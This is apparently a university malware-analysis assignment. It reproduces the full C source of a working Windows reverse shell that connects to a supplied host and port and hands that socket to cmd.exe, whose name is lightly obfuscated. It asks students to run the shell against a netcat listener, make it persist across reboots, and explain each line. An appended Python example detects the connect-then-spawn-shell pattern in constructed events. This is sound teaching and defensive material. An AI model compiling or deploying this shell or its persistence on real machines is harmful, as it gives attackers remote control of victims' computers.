SimpleReverseShell.7z

CAP 4145 Introduction to Malware Analysis
Assignment 6 – Analyze Malicious Windows Programs
19 points

Instructions:

Note: Blue text points to a web link. Ctrl + Click to follow the link.

This is a team assignment. However, every student MUST submit the term project report, even if all members of a group submit the same report.

Answers to all questions must be put into ONE document. That is, each student may submit only one report document at a time, answering all questions of this assignment, unless explicitly stated otherwise. Students must put answers following each question in this assignment. The instructor will not grade a report that contains only answers, and the student gets zero for such an assignment. An assignment report must include the original questions.

Students MUST submit the finished assignment in either Microsoft Word or PDF format to Webcourse. The document must be submitted as ONE standalone file and cannot be tarred or zipped into a container. All required files or documents must be submitted in one submission (the last submission). Note: Blackboard allows an unlimited number of submissions of one assignment by students.

Refer to Print screen on how to take a screenshot. Pressing the Alt key in combination with PrtSc captures the currently selected window.

Problems:

Answer each question following the original question. Do NOT delete the original question.

The students are provided SimpleReverseShell.7z, which contains the source code of a reverse shell.

Requirements:

The code shell.c in SimpleReverseShell.7z is given below. The students can refer to readme.txt in SimpleReverseShell.7z and search Google for specific APIs. Answer the questions following the code below.

Please read compile.sh and revise it for the programming environment chosen by the students. Hint: The programming environment is similar to the one in Assignment 5. Paste the revised compile.sh following this question. (2 points)

Run compile.sh and provide a screenshot that shows the compiled program. (1 point)

Please read readme.txt and understand how to run the program. That is, the students should first start an nc (netcat) command as a server that accepts incoming connections on the sandbox VM LINUX01. On the sandbox VM WINHOST01, the students start the malware. Please write down the commands the students run on LINUX01 and WINHOST01 following this question. (2 points)

Please provide a screenshot that shows the result of running the malware. (1 point)

Please select an approach so that the malware can start when WINHOST01 reboots. Please explain the chosen approach. (2 points)

Please post related commands or screenshots following this question to show that the chosen approach works. (2 points)

// shell.c
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32")

WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;
char aip_addr[16];
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;

int main(int argc, char *argv[])
{
    WSAStartup(MAKEWORD(2,2), &wsaData);
    Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
    if (argv[1] == NULL) {
        exit(1);
    }
    struct hostent *host;
    host = gethostbyname(argv[1]);
    strcpy(aip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));
    hax.sin_family = AF_INET;
    hax.sin_port = htons(atoi(argv[2]));
    hax.sin_addr.s_addr = inet_addr(aip_addr);
    WSAConnect(Winsock, (SOCKADDR *)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
    if (WSAGetLastError() == 0) {
        memset(&ini_processo, 0, sizeof(ini_processo));
        ini_processo.cb = sizeof(ini_processo);
        ini_processo.dwFlags = STARTF_USESTDHANDLES;
        ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
        char *myArray[4] = { "cm", "d.e", "x", "e" };
        char command[8] = "";
        snprintf(command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]);
        CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);
        exit(0);
    } else {
        exit(0);
    }
}

Please give a comment to each instruction above, and explain what each instruction does. (8 points)

Please explain what this program does. (1 point)
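Added example, not part of the assignment or of SimpleReverseShell.7z: a defender-side correlation in Python over constructed Sysmon-style events that flags the behaviour shell.c exhibits on the host, one process making an outbound TCP connection and shortly afterwards spawning cmd.exe as its child. The event field names, PIDs, paths and addresses are all constructed for the sample; the socket-as-std-handle trick itself is not visible in such logs, so the connect-then-shell sequence is the observable.

```python
"""Flag the reverse-shell pattern of shell.c: a process connects outbound,
then spawns a shell. Events are constructed Sysmon-style samples
(id 1 = ProcessCreate, id 3 = NetworkConnect), not real telemetry."""
from collections import defaultdict

# Constructed sample events, sorted later by timestamp (seconds).
EVENTS = [
    {"id": 1, "ts": 100, "pid": 4321, "image": r"C:\Users\lab\shell.exe", "ppid": 900},
    {"id": 3, "ts": 101, "pid": 4321, "dst": "10.0.0.5", "dport": 4444},
    {"id": 1, "ts": 102, "pid": 4400, "image": r"C:\Windows\System32\cmd.exe", "ppid": 4321},
    # Benign: explorer spawning cmd.exe with no prior outbound connection.
    {"id": 1, "ts": 200, "pid": 5000, "image": r"C:\Windows\explorer.exe", "ppid": 800},
    {"id": 1, "ts": 201, "pid": 5001, "image": r"C:\Windows\System32\cmd.exe", "ppid": 5000},
    # Benign: a browser connects, but its cmd.exe child comes far outside the window.
    {"id": 1, "ts": 290, "pid": 6000, "image": r"C:\Program Files\Browser\browser.exe", "ppid": 800},
    {"id": 3, "ts": 300, "pid": 6000, "dst": "93.184.216.34", "dport": 443},
    {"id": 1, "ts": 400, "pid": 6001, "image": r"C:\Windows\System32\cmd.exe", "ppid": 6000},
]

SHELLS = ("cmd.exe", "powershell.exe")  # child images treated as interactive shells

def find_reverse_shell_candidates(events, window=30):
    """Return (parent_pid, parent_image, dst, dport, child_pid) for every shell
    spawned by a parent within `window` seconds after that parent connected out."""
    ordered = sorted(events, key=lambda e: e["ts"])
    images = {e["pid"]: e["image"] for e in ordered if e["id"] == 1}
    connects = defaultdict(list)  # pid -> [(ts, dst, dport)]
    for e in ordered:
        if e["id"] == 3:
            connects[e["pid"]].append((e["ts"], e["dst"], e["dport"]))
    hits = []
    for e in ordered:
        if e["id"] != 1 or not e["image"].lower().endswith(SHELLS):
            continue
        for ts, dst, dport in connects.get(e["ppid"], []):
            if 0 <= e["ts"] - ts <= window:
                hits.append((e["ppid"], images.get(e["ppid"], "<unknown>"),
                             dst, dport, e["pid"]))
    return hits

if __name__ == "__main__":
    for hit in find_reverse_shell_candidates(EVENTS):
        print("reverse-shell candidate:", hit)
```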